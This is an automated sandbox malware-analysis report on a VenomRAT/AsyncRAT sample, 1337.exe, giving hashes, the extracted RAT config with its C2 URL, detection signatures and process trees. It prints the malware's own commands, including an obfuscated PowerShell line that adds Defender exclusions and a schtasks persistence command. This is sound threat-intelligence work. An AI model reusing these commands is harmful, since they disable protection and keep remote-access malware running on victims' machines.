Analysis
max time kernel: 91s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20250217-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/03/2025, 17:51
Static task: static1
Behavioral task behavioral1: sample 1337.exe, resource win7-20240729-en
Behavioral task behavioral2: sample 1337.exe, resource win10v2004-20250217-en
General
Target: 1337.exe
Size: 24.3MB
MD5: 124d9ebd081fe16de958304349b59316
SHA1: e2770e0cd44041e9ce91e77da2c7f56d04654ef3
SHA256: 50a1656f6cca2b5a9810f6a70352cf56d5ab156e80752a68f49e968460a634b1
SHA512: 49fcf668108b7b472bdec5261125c14e3e24251eb6b906b3bca4bf87a6333e7c1e6aec62c40a11ab975c5e4d3c750ca55cf5ef093a8f5ce7aaa70b477ab9ea9e
SSDEEP: 393216:QvKOA+h/KlqTs0jCaQBdzqLx0HQkGN3zFlfje6f4gXBNobFF6V44uS4SbO:Qi5+h/Kl3MVy9GxGGNjbP4g3oMV4E41
Malware Config
Extracted: asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
INC
lwosqqqkziedfsbxxgh
c2_url_file: https://paste.ee/r/SvRLFmbW/0
delay: 1
install: true
install_file: System.exe
install_folder: %AppData%
Signatures

Asyncrat family

Venomrat family
  resource / yara_rule:
    behavioral2/files/0x000b000000023c4f-25.dat / VenomRAT
    behavioral2/memory/3192-35-0x0000000000CE0000-0x0000000000CF8000-memory.dmp / VenomRAT

Async RAT payload (1 IoC)
  resource / yara_rule:
    behavioral2/files/0x000b000000023c4f-25.dat / family_asyncrat

Downloads MZ/PE file (1 IoC)
  flow / pid / Process:
    28 / 1528 / MinuteRise.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description / ioc / Process:
    Key value queried / \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation / 1337.exe
    Key value queried / \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation / bodrumblock.exe

Executes dropped EXE (4 IoCs)
  pid / Process:
    1528 / MinuteRise.exe
    3192 / bodrumblock.exe
    5020 / System.exe
    3168 / VanCat.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow / ioc:
    27 / raw.githubusercontent.com
    28 / raw.githubusercontent.com

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc:
    61 / api.ipify.org

Obfuscated Files or Information: Command Obfuscation (1 TTP)
  Adversaries may obfuscate content during command execution to impede detection.

Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
  pid / Process:
    1528 / MinuteRise.exe
    1528 / MinuteRise.exe
    3168 / VanCat.exe
    3168 / VanCat.exe

Drops file in Program Files directory (1 IoC)
  description / ioc / Process:
    File created / C:\Program Files\VanCat.exe / MinuteRise.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe (1 IoC)
  pid / Process:
    2484 / timeout.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid / Process:
    4768 / schtasks.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid / Process (the 64 rows in the report are repeats of these five pairs):
    4784 / powershell.exe
    3192 / bodrumblock.exe
    1528 / MinuteRise.exe
    5020 / System.exe
    3168 / VanCat.exe

Suspicious use of AdjustPrivilegeToken (45 IoCs)
  description / pid / Process:
    Token: SeDebugPrivilege / 4784 / powershell.exe
    Token: SeDebugPrivilege / 3192 / bodrumblock.exe
    Token: SeDebugPrivilege / 5020 / System.exe
    2336 / WMIC.exe, the following sequence of 21 tokens, recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of SetWindowsHookEx (1 IoC)
  pid / Process:
    5020 / System.exe

Suspicious use of WriteProcessMemory (34 IoCs)
  description / pid / Process / procid_target (each row is recorded twice in the report):
    PID 1736 wrote to memory of 4784 / 1736 / 1337.exe / 86
    PID 1736 wrote to memory of 1528 / 1736 / 1337.exe / 88
    PID 1736 wrote to memory of 3192 / 1736 / 1337.exe / 90
    PID 3192 wrote to memory of 1984 / 3192 / bodrumblock.exe / 91
    PID 3192 wrote to memory of 1596 / 3192 / bodrumblock.exe / 92
    PID 1596 wrote to memory of 2484 / 1596 / cmd.exe / 96
    PID 1984 wrote to memory of 4768 / 1984 / cmd.exe / 95
    PID 1596 wrote to memory of 5020 / 1596 / cmd.exe / 102
    PID 1528 wrote to memory of 3168 / 1528 / MinuteRise.exe / 104
    PID 1528 wrote to memory of 3140 / 1528 / MinuteRise.exe / 107
    PID 1528 wrote to memory of 4400 / 1528 / MinuteRise.exe / 108
    PID 1528 wrote to memory of 1056 / 1528 / MinuteRise.exe / 110
    PID 1056 wrote to memory of 4212 / 1056 / cmd.exe / 111
    PID 1056 wrote to memory of 232 / 1056 / cmd.exe / 112
    PID 1056 wrote to memory of 4084 / 1056 / cmd.exe / 113
    PID 3168 wrote to memory of 2512 / 3168 / VanCat.exe / 114
    PID 2512 wrote to memory of 2336 / 2512 / cmd.exe / 115

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (depth shown as 1..5; signature hits listed under each process)

1. C:\Users\Admin\AppData\Local\Temp\1337.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\1337.exe"
   PID: 1736
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbAB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAZABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdgBhACMAPgA="
      Decoded (UTF-16LE base64): <#nly#>Add-MpPreference <#eky#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#wdc#> -Force <#zva#>
      (The command adds Microsoft Defender exclusions for the whole user profile and system drive; the <#...#> fragments are PowerShell block comments inserted as padding, which is what the Command Obfuscation signature flags.)
      PID: 4784
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

   2. C:\Users\Admin\AppData\Roaming\MinuteRise.exe
      Command line: "C:\Users\Admin\AppData\Roaming\MinuteRise.exe"
      PID: 1528
      - Downloads MZ/PE file
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

      3. C:\Program Files\VanCat.exe
         Command line: "C:\Program Files\VanCat.exe"
         PID: 3168
         - Executes dropped EXE
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c wmic CPU get ProcessorId
            PID: 2512
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\System32\Wbem\WMIC.exe
               Command line: wmic CPU get ProcessorId
               PID: 2336
               - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\system32\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /c color 0F
         PID: 3140

      3. C:\Windows\system32\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /c cls
         PID: 4400

      3. C:\Windows\system32\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\MinuteRise.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
         PID: 1056
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\certutil.exe
            Command line: certutil -hashfile "C:\Users\Admin\AppData\Roaming\MinuteRise.exe" MD5
            PID: 4212

         4. C:\Windows\system32\find.exe
            Command line: find /i /v "md5"
            PID: 232

         4. C:\Windows\system32\find.exe
            Command line: find /i /v "certutil"
            PID: 4084

   2. C:\Users\Admin\AppData\Roaming\bodrumblock.exe
      Command line: "C:\Users\Admin\AppData\Roaming\bodrumblock.exe"
      PID: 3192
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\cmd.exe
         Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
         PID: 1984
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
            PID: 4768
            - Scheduled Task/Job: Scheduled Task

      3. C:\Windows\system32\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCCA6.tmp.bat""
         PID: 1596
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\timeout.exe
            Command line: timeout 3
            PID: 2484
            - Delays execution with timeout.exe

         4. C:\Users\Admin\AppData\Roaming\System.exe
            Command line: "C:\Users\Admin\AppData\Roaming\System.exe"
            PID: 5020
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads